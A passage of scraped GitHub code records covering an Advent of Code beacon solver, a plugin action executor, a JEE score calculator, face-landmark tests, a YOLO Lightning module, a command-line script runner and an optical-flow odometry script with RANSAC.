rotated_beacons.append((xx, yy, zz))\n if single_matches.get(beacon):\n x, y, z = single_matches[beacon]\n offsets.add((x - xx, y - yy, z - zz))\n\n if len(offsets) == 1:\n xx, yy, zz = one(offsets)\n known_scanner_locations.add((xx, yy, zz))\n known_scanners.add(scanner)\n new_beacons = {\n (x + xx, y + yy, z + zz) for (x, y, z) in rotated_beacons\n }\n distances[scanner] = {}\n for a, b in combinations(new_beacons, 2):\n distances[scanner][distance(a, b)] = (a, b)\n known_beacons.update(new_beacons)\n break\n return known_beacons, known_scanner_locations\n\n\ndef match_to_known_beacons(\n beacons: list[Vector], distances: Iterable[dict[float, Pair]]\n) -> None | dict[Vector, Vector]:\n current_distances = dict[float, Pair]()\n for a, b in combinations(beacons, 2):\n current_distances[distance(a, b)] = a, b\n for o_distances in distances:\n matches = defaultdict[Vector, set[Vector]](set)\n for d, (a, b) in current_distances.items():\n if o_distances.get(d):\n if not matches[a]:\n matches[a].update(o_distances[d])\n else:\n matches[a] = matches[a].intersection(o_distances[d])\n if not matches[b]:\n matches[b].update(o_distances[d])\n else:\n matches[b] = matches[b].intersection(o_distances[d])\n single_matches = {k: one(v) for k, v in matches.items() if len(v) == 1}\n if len(single_matches) >= 12:\n return single_matches\n return None\n\n\ndef resolve() -> None:\n beacons, scanners = find_everything()\n print(len(beacons))\n print(max(manhattan_distance(a, b) for a, b in combinations(scanners, 2)))\n\n\nif __name__ == \"__main__\":\n resolve()\n","repo_name":"rbusquet/advent-of-code","sub_path":"aoc_2021/day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"42857057171","text":"import os\nimport logging\nimport platform\nimport importlib\nimport 
inspect\nimport sys\n\ndef execute_action(working_action, entities, shared_data, output_widget=None, chat_prompt=None):\n \"\"\"\n Executes the specified action based on the provided action string and entities.\n\n Args:\n working_action (tuple): Pair whose second element is the action name and whose first element is the action payload passed through to the executor.\n entities (dict): The entities extracted from the user input.\n shared_data: Shared state made available to the action.\n output_widget (QTextEdit, optional): The QTextEdit widget used for displaying output. Defaults to None.\n chat_prompt (ChatPrompt, optional): The ChatPrompt instance used for interacting with the user. Defaults to None.\n \"\"\"\n os_name = platform.system()\n logging.debug(f\"action_parts: intent,action received: {working_action}\")\n logging.debug(f\"action_parts: {working_action}\")\n # Set to true for testing new action_parts. When set true will only run that action and no others.\n\n\n # Construct the action module name with subfolder check\n action_module_name = f\"custom_actions.{working_action[1]}.{working_action[1]}_executor\"\n # Default to the top-level module path; avoids a NameError when no subfolder matches\n subfolder_module_name = action_module_name\n\n # Check for subfolders in custom_actions\n subfolder_names = [\"file_actions\", \"system_actions\", \"misc_actions\", \"web_actions\", \"word_actions\", \"debug_actions\" ]\n for subfolder_name in subfolder_names:\n subfolder_check = f\"custom_actions.{subfolder_name}.{working_action[1]}.{working_action[1]}_executor\"\n try:\n print(subfolder_check)\n action_module = importlib.import_module(subfolder_check)\n subfolder_module_name = f\"custom_actions.{subfolder_name}.{working_action[1]}.{working_action[1]}_executor\"\n print(\"module found\")\n break\n except ModuleNotFoundError:\n pass\n \n\n # Dynamically load the action executor module based on the resolved module name\n action_module = importlib.import_module(subfolder_module_name)\n\n # Get the custom action function from the loaded module\n action_function_name = f\"{working_action[1]}_execution\"\n action_function = getattr(action_module, action_function_name)\n\n # Get the parameters of the custom action function\n action_signature = inspect.signature(action_function)\n action_args = []\n\n for param_name, param in action_signature.parameters.items():\n if param_name == 'output_widget':\n action_args.append(output_widget)\n elif param_name == 'entities':\n action_args.append(entities)\n elif param_name == 'shared_data':\n action_args.append(shared_data)\n elif param_name == 'chat_prompt':\n action_args.append(chat_prompt)\n elif param_name == 'os_name':\n action_args.append(os_name)\n elif param_name == 'working_action':\n action_args.append(working_action[0])\n\n # Execute the action function with the prepared arguments\n action_function(*action_args)","repo_name":"scott-ca/mykros_framework","sub_path":"custom_actions/execute_actions.py","file_name":"execute_actions.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"25285070540","text":"import os\ntry:\n from bs4 import BeautifulSoup\nexcept:\n print('[!] 
BeautifulSoup4 not found')\n exit()\n\ndef checkPresent():\n if 'nt' in os.name and os.path.exists('Data\\\\Response.html') and os.path.exists('Data\\\\AnswerKey.html'):\n print('Found Response and AnswerKey.')\n elif 'posix' in os.name and os.path.exists('Data/Response.html') and os.path.exists('Data/AnswerKey.html'):\n print('Found Response and AnswerKey.')\n else:\n print(\"[ERROR] Response and/or AnswerKey Not Found!!\")\n input()\n exit(-1)\n\nclass Question:\n def __init__(self, queid, ans):\n self.id = queid\n self.ans = ans\n\n def check(self, res:str):\n self.res = str(res)\n\n if len(self.ans) == 11:\n if '-' in self.res:\n return None\n elif self.res == self.ans:\n return '4'\n else:\n # print('here')\n return '-1'\n else:\n if '-' in self.res:\n return None\n elif self.res == self.ans:\n return '4'\n else:\n return '0'\n\nclass Result:\n def __init__(self, subject=None):\n self.subject = subject\n\n self.ques = {}\n\n self.correct_mcq = 0\n self.correct_num = 0\n self.incorrect_mcq = 0\n self.incorrect_num = 0\n self.unsolved = 0\n\n self.mks = 0\n self.totalMks = 100\n\n def addQue(self, queid, ans):\n self.ques[queid] = Question(queid, ans)\n\n \n def check(self,queid, res:str):\n a = self.ques[str(queid)].check(res) # couldn't think of better name :(\n res = str(res)\n if a != None:\n self.mks += int(a)\n # print(int(a))\n if a=='4':\n if len(res) == 11:\n self.correct_mcq += 1\n else:\n #print(len(res))\n self.correct_num += 1\n else:\n if len(res) == 11:\n self.incorrect_mcq += 1\n else:\n self.incorrect_num += 1\n elif a == None:\n self.unsolved += 1\n\n def show(self):\n if self.subject:\n print(f'Subject: {self.subject}')\n else:\n print('Total:')\n\n print(f'Correct(MCQ, Num): {self.correct_mcq}, {self.correct_num} = {self.correct_mcq + self.correct_num}')\n print(f'Incorrect(MCQ, Num): {self.incorrect_mcq}, {self.incorrect_num} = {self.incorrect_mcq + self.incorrect_num}')\n print(f'Unsolved: {self.unsolved}')\n print(f'Score: {self.mks}\\\\{self.totalMks}')\n\n def __add__(*args):\n ret = Result()\n ret.totalMks = 0\n\n for i in ['incorrect_mcq', 'incorrect_num', 'correct_mcq', 'correct_num', 'unsolved', 'mks', 'totalMks']:\n for arg in args:\n cmd = f'ret.{i} += arg.{i}'\n exec(cmd)\n\n \n return ret\n\n\ndef checkResponse():\n global phy_result, chem_result, math_result\n\n if 'nt' in os.name:\n dir = 'Data\\\\'\n elif 'posix' in os.name:\n dir = 'Data/'\n\n with open(dir+'Response.html') as response:\n page = response.readlines()\n\n soup = BeautifulSoup(''.join(page), 'html.parser')\n\n section_list = soup.findAll('div', {'class': 'section-cntnr'})\n\n responses = {}\n\n for i in range(6):\n section = section_list[i]\n question_list = section.findAll('table', {'class': 'menu-tbl'})\n question_data = section.findAll('table', {'class': 'questionRowTbl'})\n\n for j in range(len(question_list)):\n question = question_list[j]\n tbl_data = question.findAll('tr')\n queid = str(tbl_data[1].findAll('td')[1].text)\n\n if i%2==0:\n myop = tbl_data[7].findAll('td')[1].text\n try:\n opid = int(myop) + 1\n myres = str(tbl_data[opid].findAll('td')[1].text)\n except ValueError:\n myres = ' -- '\n \n\n else:\n question = question_data[j]\n myres = question.findAll('td')[5].text\n try:\n float(myres)\n except ValueError:\n myres = ' -- '\n\n if i==0 or i==1:\n phy_result.check(queid, myres)\n elif i==2 or i==3:\n chem_result.check(queid, myres)\n elif i==4 or i==5:\n math_result.check(queid, myres)\n\n\ndef getAnswers():\n global phy_result, chem_result, math_result\n\n if 'nt' in 
os.name:\n dir = 'Data\\\\'\n elif 'posix' in os.name:\n dir = 'Data/'\n\n with open(dir+'AnswerKey.html') as response:\n page = response.readlines()\n\n soup = BeautifulSoup(''.join(page), 'html.parser')\n\n answers = {\n 'Physics' : {},\n 'Chemistry' : {},\n 'Maths' : {}\n }\n\n answer_tbl = soup.findAll('table')[1]\n que_str = 'ctl00_LoginContent_grAnswerKey_ctl{:02d}_lbl_QuestionNo'\n ans_str = 'ctl00_LoginContent_grAnswerKey_ctl{:02d}_lbl_RAnswer'\n\n count = 0\n\n for i in range(2, 92):\n que = que_str.format(i)\n ans = ans_str.format(i)\n\n queid = str(soup.find('span', {'id' : que}).text)\n answer = str(soup.find('span', {'id': ans}).text)\n\n if (i-2)<30:\n # sub = 'Physics'\n phy_result.addQue(queid, answer)\n elif (i-2)>29 and (i-2)<60:\n # sub = 'Chemistry'\n chem_result.addQue(queid, answer)\n else:\n # sub = 'Maths'\n math_result.addQue(queid, answer)\n\ndef main():\n checkPresent()\n \n '''phy_result = Result('Physics')\n chem_result = Result('Chemistry')\n math_result = Result('Maths')'''\n\n getAnswers()\n checkResponse()\n\n #phy_result.show()\n #print(phy_result.ques)\n \n\nif __name__=='__main__':\n phy_result = Result('Physics')\n chem_result = Result('Chemistry')\n math_result = Result('Maths')\n \n checkPresent()\n print()\n\n getAnswers()\n checkResponse()\n total = phy_result + chem_result + math_result\n\n phy_result.show()\n print()\n chem_result.show()\n print()\n math_result.show()\n print()\n total.show()","repo_name":"shreyash-b/jee-score-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3703735891","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport pytest\nimport numpy as np\n\nfrom pfla.img_prep import ImgPrep\nfrom pfla.face_detect import FaceDetect\nfrom pfla.annotate import FaceAnnotate\nfrom pfla.metrics import Metrics\nfrom pfla.linear import Linear\nfrom pfla.logger import Logger\n\nCURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\nPATH_DATA_TEST = os.path.join(CURRENT_PATH, \"data\")\n\n@pytest.fixture\ndef prep_fxt():\n img_path = os.path.join(PATH_DATA_TEST, \"m01.jpg\")\n dir_path = PATH_DATA_TEST\n\n return ImgPrep(img_path), ImgPrep(dir_path)\n\ndef test_prep(prep_fxt):\n single_im, multiple_im = prep_fxt\n\n s_array, s_index = single_im.prepare_file()\n assert len(s_index) == 1\n assert isinstance(s_array, np.ndarray)\n\n m_array, m_index = multiple_im.prepare_dir()\n assert len(m_index) == 5\n assert isinstance(m_array, np.ndarray)\n\n@pytest.fixture\ndef detect_fxt(prep_fxt):\n single_im, multiple_im = prep_fxt\n s_array, s_index = single_im.prepare_file()\n m_array, m_index = multiple_im.prepare_dir()\n\n return FaceDetect(s_array, True), FaceDetect(m_array, False)\n\ndef test_detect(detect_fxt):\n single_det, multiple_det = detect_fxt\n\n s_box = single_det.mtcnn_box()\n assert len(s_box) == 1\n\n m_box = multiple_det.mtcnn_box()\n assert len(m_box) == 5\n\n@pytest.fixture\ndef annotate_fxt(prep_fxt, detect_fxt):\n single_im, multiple_im = prep_fxt\n s_array, s_index = single_im.prepare_file()\n m_array, m_index = multiple_im.prepare_dir()\n\n single_det, multiple_det = detect_fxt\n\n s_box = single_det.mtcnn_box()\n m_box = multiple_det.mtcnn_box()\n\n return FaceAnnotate(s_array, s_box, True), FaceAnnotate(m_array, m_box, False)\n\n\ndef test_annotate(annotate_fxt):\n single_annotate, multiple_annotate = annotate_fxt\n\n s_ldmk = single_annotate.get_ldmk()\n assert 
isinstance(s_ldmk, np.ndarray)\n assert np.shape(s_ldmk) == (68, 2)\n\n m_ldmk = multiple_annotate.get_ldmk()\n assert isinstance(m_ldmk, np.ndarray)\n assert np.shape(m_ldmk) == (5, 68, 2)\n\n@pytest.fixture\ndef metrics_fxt(annotate_fxt):\n single_annotate, multiple_annotate = annotate_fxt\n\n s_ldmk = single_annotate.get_ldmk()\n m_ldmk = multiple_annotate.get_ldmk()\n\n return Metrics(s_ldmk, True), Metrics(m_ldmk, False),\n\ndef test_metrics(metrics_fxt):\n single_metrics, multiple_metrics = metrics_fxt\n\n s_metrics = single_metrics.compute_metrics()\n assert isinstance(s_metrics, np.ndarray)\n assert np.shape(s_metrics) == (4,)\n\n m_metrics = multiple_metrics.compute_metrics()\n assert isinstance(m_metrics, np.ndarray)\n assert np.shape(m_metrics) == (4, 5)\n\ndef test_linear():\n a = np.array([1,1])\n b = np.array([2,2])\n\n ln = Linear(a[0], a[1], b[0], b[1])\n dist = ln.euc_dist()\n\n assert dist == np.sqrt(2)\n\ndef test_logger():\n v_logging = Logger(True)\n nv_logging = Logger(False)\n\n assert v_logging.info('test message of level info', 0) == None\n assert nv_logging.info('test message of level warning', 1) == None\n","repo_name":"maxrousseau/pfla","sub_path":"pfla/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25762881786","text":"\"\"\"A collection of scripts that can be easily called from the command line.\"\"\"\n\n\nfrom PyQt5.QtWidgets import QApplication\nfrom sys import argv as sys_argv\nfrom commandline import openfile\nfrom typing import Callable as C\nfrom winnotify import PlaySound\nfrom subprocess import run\nfrom pathlib import Path\nfrom re import sub\nimport logging\n\nfrom argparse import (\n ArgumentParser as ArgParser,\n RawTextHelpFormatter\n)\nfrom textwrap import (\n dedent,\n fill\n)\nfrom . 
import src\n\n\nclass main:\n pKwargs = dict(add_help=False,\n formatter_class=RawTextHelpFormatter)\n hArgs = ['-h', '--help']\n hKwargs = dict(help=\"show this help message\",\n action='store_true')\n wArgs = ['-w', '--window']\n wKwargs = dict(help=\"redirect help and errors to a new window\",\n action='store_true')\n console: bool\n dirname: Path\n subs: dict[C, ArgParser]\n parser: ArgParser\n\n def __init__(self):\n # init vars\n app = QApplication(sys_argv)\n self.dirname = Path(__file__).parent\n self.console = False\n self.subs = dict()\n err = False\n # setup logging\n logfile = self.dirname.joinpath('lib', 'logging.log')\n logging.basicConfig(filename=logfile,\n filemode='w',\n level=logging.DEBUG,\n format='[%(asctime)s] %(levelname)s: %(module)s.%(funcName)s\\n%(message)s\\n',\n datefmt='%m/%d/%Y %I:%M:%S%p')\n try:\n self.buildParser()\n self.runScript()\n except Exception:\n logging.exception('')\n err = True\n raise\n finally:\n if logfile.read_text():\n if err:\n PlaySound()\n if self.console:\n openfile(logfile, 'min')\n else:\n print(logfile.read_text())\n run(['powershell', 'pause'])\n # app.exec()\n\n def buildParser(self) -> None:\n # create parser\n self.parser = ArgParser(prog=self.dirname.name,\n description=__doc__,\n **self.pKwargs)\n self.parser.add_argument(*self.hArgs, **self.hKwargs)\n self.parser.add_argument(*self.wArgs, **self.wKwargs)\n self.subpars = self.parser.add_subparsers(\n help=f\"METHOD DESCRIPTION:\\n{'='*20}\")\n # create help\n functions = {f: getattr(src, f) for f in src.__all__}\n for name, script in functions.items():\n self.createHelp(name, script)\n\n def createHelp(self, name: str, script):\n def wrap(txt: str) -> str:\n outstr = str()\n for line in dedent(txt).split('\\n'):\n outstr += fill(text=line,\n width=75)\n outstr += '\\n'\n return outstr\n subpar = self.subpars.add_parser(\n name=name,\n description=wrap(script.__doc__),\n help=wrap(script.__doc__),\n **self.pKwargs)\n subpar.add_argument(*self.hArgs, **self.hKwargs)\n subpar.add_argument(*self.wArgs, **self.wKwargs)\n subpar.add_argument('-a', '--args',\n help=wrap(sub(pattern=r'Parameters.*\\n\\s*',\n repl='',\n string=script.__init__.__doc__)),\n nargs='+')\n subpar.set_defaults(func=script)\n self.subs[script] = subpar\n\n def runScript(self):\n all_args = self.parser.parse_args()\n self.console = all_args.window\n if all_args.help:\n try:\n logging.info(self.subs[all_args.func].format_help())\n except Exception:\n logging.info(self.parser.format_help())\n else:\n args = all_args.args or list()\n all_args.func(*args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Cryden13/SystemScripts","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16819624437","text":"from pytorch_lightning.core.lightning import LightningModule\nimport torch\nimport torch.nn as nn\n\nfrom pathlib import Path\n\nfrom visualize import save_res_im\n\n\nclass Yolo(LightningModule):\n\n def __init__(self, net, loss_func, train_root, val_root, target_file, lr, epochs, pred_classes,\n batch_size, im_save, output_size):\n super().__init__()\n self.net = net\n # self.criterion = loss_func\n self.train_root = train_root\n self.val_root = val_root\n self.target_file = target_file\n self.lr = lr\n self.epochs = epochs\n self.pred_classes = pred_classes\n self.batch_size = batch_size\n self.output_size = output_size\n\n # self.im_save = 
Path(\"/res/res_im\").mkdir(exist_ok=True, parents=True)\n self.im_save = Path(\"/res/res_im\")\n self.im_save.mkdir(exist_ok=True, parents=True)\n self.now_epoch = 1\n\n def forward(self, x):\n return self.net(x)\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n # loss = self.criterion(logits, y)\n loss = nn.MSELoss()(logits, y)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n # loss = self.criterion(logits, y)\n loss = nn.MSELoss()(y, logits)\n save_res_im(x, logits, y, \"res_{}.jpg\".format(self.now_epoch), str(self.im_save), self.output_size)\n self.now_epoch += 1\n self.log(\"val_loss\", loss)\n return loss\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.net.parameters(), lr=self.lr)\n","repo_name":"bokutotu/yolov1","sub_path":"yolov1/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18138751975","text":"import numpy as np\nimport os\nfrom PIL import Image\nimport os\nimport math\nfrom matplotlib.colors import hsv_to_rgb\nimport random\n\nfrom Matrix import Matrix\n\n\ndef evaluate(file, file_err, old_R, old_t, matrix_input, num_iters, image_results, mode):\n img_gray = image_results[0]\n img_array = image_results[1]\n flow_u_array = image_results[2]\n flow_v_array = image_results[3]\n\n height = img_gray.shape[1]\n width = img_gray.shape[2]\n\n #create uv image and mask\n mask_array_non_zero = np.logical_and(np.logical_and(abs(flow_u_array) > 0.001, abs(flow_v_array) > 0.001),\n img_array > 0.001)\n\n boundry_pixels = 50\n mask_out_boundry = np.zeros((height, width), dtype=bool)\n mask_out_boundry[boundry_pixels:height - boundry_pixels, boundry_pixels:width-boundry_pixels] = True\n mask_out_boundry = mask_out_boundry.flatten()\n mask = np.logical_and(mask_array_non_zero, mask_out_boundry)\n\n img_v, img_u, R_center = _calculate_rotation_midpoint(height, width, flow_v_array, flow_u_array, mask)\n\n matrix_flow_v = img_v + flow_v_array\n matrix_flow_u = img_u - flow_u_array\n\n matrix_im1 = []\n matrix_im2 = []\n\n for idx, val in enumerate(mask):\n if val:\n matrix_im1.append([img_v[idx], img_u[idx], 0])\n matrix_im2.append([matrix_flow_v[idx], matrix_flow_u[idx], 0])\n\n matrix_im1 = np.transpose(np.asarray(matrix_im1))\n matrix_im2 = np.transpose(np.asarray(matrix_im2))\n\n best_model = ransac(matrix_im1, matrix_im2)\n [R, c, t] = best_model\n\n R_now = rotationMatrixToEulerAngles(R)[2]\n t_x = t[0] * np.cos(old_R) - t[1] * np.sin(old_R)\n t_y = -(t[0] * np.sin(old_R) + t[1] * np.cos(old_R))\n\n R = old_R + R_now\n t_rotated = [(t_x+old_t[0]).item(0), (t_y+old_t[1]).item(0)]\n\n if matrix_input is not None:\n delta_t_x, delta_t_y, delta_R_is = calculate_err(matrix_input, num_iters, R_now, t, file, file_err, t_x, t_y, t_rotated)\n else:\n mode = 'estimated'\n\n output_flow = np.zeros([height, width, 2])\n #Save flow without estimated self movement\n flow_u_without=[]\n flow_v_without=[]\n if mode == \"estimated\":\n t_1 = t[1] * 10.0\n t_0 = t[0] * 10.0\n flow_u_without = (flow_u_array - t_1 + img_u * np.cos(R_now) + img_v * np.sin(R_now) - img_u) * mask_array_non_zero\n flow_v_without = (flow_v_array - t_0 + img_u * np.sin(R_now) - img_v * np.cos(R_now) + img_v) * mask_array_non_zero\n elif mode == 'real':\n #Save flow without real self movement\n t_0 = (-(delta_t_x.item(0) * np.cos(old_R) - delta_t_y.item(0) * np.sin(old_R))) * 10.0\n t_1 = 
(delta_t_x.item(0) * np.sin(old_R) + delta_t_y.item(0) * np.cos(old_R)) * 10.0\n flow_u_without = (flow_u_array - t_1 + img_u * np.cos(delta_R_is) + img_v * np.sin(delta_R_is) - img_u) * mask_array_non_zero\n flow_v_without = (flow_v_array - t_0 + img_u * np.sin(delta_R_is) - img_v * np.cos(delta_R_is) + img_v) * mask_array_non_zero\n else:\n print('Should choose between real and estimated')\n\n\n #write image and odometry\n file.write(\"0 0 0 \" + str(t_rotated[0]) + \" 0 0 0 \" + str(t_rotated[1]) + \" 0 \" + str(R_now) + \" \" + str(t[0]) + \" \" + str(t[1]) + \"\\n\")\n\n output_flow[:, :, 0] = flow_u_without.reshape((height, width))\n output_flow[:, :, 1] = flow_v_without.reshape((height, width))\n\n img_flow_rgb = (_convert_flow_to_rgb(output_flow) * 255.0).astype(np.uint8)\n img_flow_rgb = Image.fromarray(img_flow_rgb)\n\n directory = '/home/zhang/flow_without_' + mode + '_motion/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n img_flow_rgb.save(directory + str(num_iters) + '_output_flow.jpeg')\n\n return R, t_rotated\n\n\ndef calculate_err(matrix_input, num_iters, R_now, t, file, file_err, t_x, t_y, t_rotated):\n #read now and previous groundtruth\n matrix_gt = matrix_input.return_matrix(num_iters + 3)\n matrix_gt_pr = matrix_input.return_matrix(num_iters + 2)\n R_gt = matrix_gt[:,0:3]\n t_gt = matrix_gt[:,3]\n R_gt_pr = matrix_gt_pr[:,0:3]\n t_gt_pr = matrix_gt_pr[:,3]\n R_gt = rotationMatrixToEulerAngles(R_gt)[1]\n R_gt_pr = rotationMatrixToEulerAngles(R_gt_pr)[1]\n\n delta_R_is = R_gt - R_gt_pr\n delta_t_x = t_gt[2] - t_gt_pr[2]\n delta_t_y = -(t_gt[0] - t_gt_pr[0])\n\n R_err = R_now - delta_R_is\n t_x_err = t_x - delta_t_x.item(0)\n t_y_err = t_y - delta_t_y.item(0)\n\n file_err.write(str(R_err) + \" \" + str(t_x_err) + \" \" + str(t_y_err) + \"\\n\")\n return delta_t_x, delta_t_y, delta_R_is\n\n\ndef _convert_flow_to_rgb(flow):\n n = 2\n max_flow = 20\n flow_u = flow[:,:,0]\n flow_v = flow[:,:,1]\n mag = np.sqrt(np.sum(np.square(flow), axis=2))\n angle = np.arctan2(flow_v, flow_u)\n\n im_h = np.mod(angle / (2 * np.pi) + 1.0, 1.0)\n im_s = np.clip(mag * n / max_flow, 0, 1)\n im_v = np.clip(n - im_s, 0, 1)\n\n im_hsv = np.zeros((flow.shape[0], flow.shape[1], 3))\n im_hsv[:, :, 0] = im_h\n im_hsv[:, :, 1] = im_s\n im_hsv[:, :, 2] = im_v\n im = hsv_to_rgb(im_hsv)\n\n return im\n\n\ndef _ralign(X,Y):\n m, n = X.shape\n\n mx = X.mean(1)\n my = Y.mean(1)\n Xc = X - np.tile(mx, (n, 1)).T\n Yc = Y - np.tile(my, (n, 1)).T\n\n sx = np.mean(np.sum(Xc*Xc, 0))\n sy = np.mean(np.sum(Yc*Yc, 0))\n\n Sxy = np.dot(Yc, Xc.T) / n\n\n U,D,V = np.linalg.svd(Sxy,full_matrices=True,compute_uv=True)\n V=V.T.copy()\n #print U,\"\\n\\n\",D,\"\\n\\n\",V\n r = np.linalg.matrix_rank(Sxy)\n d = np.linalg.det(Sxy)\n S = np.eye(m)\n # reflection handling; the last diagonal entry is index m - 1 (0-indexed)\n if r > (m - 1):\n if (d < 0):\n S[m - 1, m - 1] = -1\n elif (r == m - 1):\n if (np.linalg.det(U) * np.linalg.det(V) < 0):\n S[m - 1, m - 1] = -1\n else:\n R = np.eye(2)\n c = 1\n t = np.zeros(2)\n return R,c,t\n\n R = np.dot(np.dot(U, S), V.T)\n\n c = np.trace(np.dot(np.diag(D), S)) / sx\n t = my - c * np.dot(R, mx)\n\n return R, c, t*0.1\n\n\n# Checks if a matrix is a valid rotation matrix.\ndef _isRotationMatrix(R):\n Rt = np.transpose(R)\n shouldBeIdentity = np.dot(Rt, R)\n I = np.identity(3, dtype=R.dtype)\n n = np.linalg.norm(I - shouldBeIdentity)\n return n < 1e-6\n\n\n# Calculates rotation matrix to euler angles\n# The result is the same as MATLAB except the order\n# of the euler angles ( x and z are swapped ).\ndef rotationMatrixToEulerAngles(R):\n assert (_isRotationMatrix(R))\n\n sy = 
math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])\n\n singular = sy < 1e-6\n\n if not singular:\n x = math.atan2(R[2, 1], R[2, 2])\n y = math.atan2(-R[2, 0], sy)\n z = math.atan2(R[1, 0], R[0, 0])\n else:\n x = math.atan2(-R[1, 2], R[1, 1])\n y = math.atan2(-R[2, 0], sy)\n z = 0\n\n return np.array([x, y, z])\n\n\ndef _calculate_rotation_midpoint(height, width, flow_v_array, flow_u_array, mask):\n flow_none_zeros = []\n for idx, val in enumerate(mask):\n if val:\n flow_none_zeros.append([flow_v_array[idx], flow_u_array[idx]])\n\n flow_none_zeros = np.asarray(flow_none_zeros)\n length = flow_none_zeros.shape[0]\n if length%2 != 0:\n length = length - 1\n flow_left = flow_none_zeros[0:int(length/2), :]\n flow_left = np.divide(flow_left, np.reshape(np.linalg.norm(flow_left, axis=-1), (int(length/2), 1)))\n flow_right = flow_none_zeros[int(length/2):length, :]\n flow_right = np.divide(flow_right, np.reshape(np.linalg.norm(flow_right, axis=-1), (int(length/2), 1)))\n\n check_parallel = (np.abs(np.cross(flow_left, flow_right)) > 0.1).sum() / int(length/2)\n\n img_u = np.zeros((height, width))\n img_v = np.zeros((height, width))\n for v in range(height):\n img_v[v, :] = v\n for u in range(width):\n img_u[:, u] = u\n if check_parallel > 1.0:\n print(\"Percentage:\" + str(check_parallel) + \" Estimating rotation midpoint\")\n img_v_flat = np.asarray(img_v.flatten())\n img_u_flat = np.asarray(img_u.flatten())\n Y = []\n img_VU = []\n for idx, val in enumerate(mask):\n if val:\n Y.append(flow_v_array[idx] * img_v_flat[idx] + flow_u_array[idx] * img_u_flat[idx])\n img_VU.append([img_v_flat[idx], img_u_flat[idx]])\n center = center_ransac(flow_none_zeros, Y, img_VU)\n print(center)\n else:\n center = [height, width / 2.0]\n\n img_v = center[0] - img_v\n img_u = img_u - center[1]\n return img_v.flatten(), img_u.flatten(), center\n\n\ndef ransac(X, Y, sample_size=10, max_iterations=100, stop_at_goal=True, random_seed=None):\n n = X.shape[1]\n print(\"Number of points: \", n)\n goal_inliers = n * 0.7\n\n best_ic = 0\n best_model = None\n\n data = np.concatenate([X, Y], axis=0)\n data = data.T\n random.seed(random_seed)\n\n # random.sample cannot deal with \"data\" being a numpy array\n data = list(data)\n for i in range(max_iterations):\n s = random.sample(data, int(sample_size))\n s = np.asarray(s)\n array_1 = np.transpose(s[:, :3])\n array_2 = np.transpose(s[:, 3:])\n\n R, c, t = _ralign(array_1, array_2)\n ic = count_inlier(R, c, t*10, X, Y)\n\n if ic > best_ic:\n best_ic = ic\n best_model = [R, c, t]\n if ic > goal_inliers and stop_at_goal:\n break\n\n return best_model\n\n\ndef count_inlier(R, c, t, array_1, array_2):\n transformed_img = np.add(np.dot(c * R, array_1), np.reshape(t, (3, 1)))\n err = np.sum(np.square(np.subtract(transformed_img, array_2)), axis=0)\n ic = len(np.where(err < 10)[0])\n return ic\n\n\ndef center_ransac(X, Y, img_VU, sample_size=50, max_iterations=100, stop_at_goal=True, random_seed=None):\n n = X.shape[0]\n print(\"Number of points: \", n)\n goal_inliers = n * 0.7\n\n best_ic = 0\n best_model = None\n\n Y = np.reshape(Y, (n, 1))\n data = np.concatenate([X, Y], axis=1)\n random.seed(random_seed)\n\n # random.sample cannot deal with \"data\" being a numpy array\n data = list(data)\n for i in range(max_iterations):\n s = random.sample(data, int(sample_size))\n s = np.asarray(s)\n array_1 = s[:, :2]\n array_2 = s[:, 2:]\n\n array_1_T = np.transpose(array_1)\n center = np.dot(np.dot(np.linalg.inv(np.dot(array_1_T, array_1)), array_1_T), array_2)\n ic = 
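The repaired _ralign above is a Umeyama-style rigid alignment; a synthetic round-trip check is a quick way to validate the fixes (a sketch, assuming _ralign is in scope from this module — note that the function returns the translation scaled by 0.1):

import numpy as np

rng = np.random.default_rng(0)
X = rng.standard_normal((3, 20))          # 3D points as columns
theta = 0.3
R_true = np.array([[np.cos(theta), -np.sin(theta), 0.0],
                   [np.sin(theta),  np.cos(theta), 0.0],
                   [0.0,            0.0,           1.0]])
t_true = np.array([1.0, -2.0, 0.5])
Y = R_true @ X + t_true[:, None]

R_est, c_est, t_est = _ralign(X, Y)
assert np.allclose(R_est, R_true, atol=1e-6)
assert np.isclose(c_est, 1.0, atol=1e-6)
assert np.allclose(t_est * 10.0, t_true, atol=1e-5)   # _ralign scales t by 0.1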
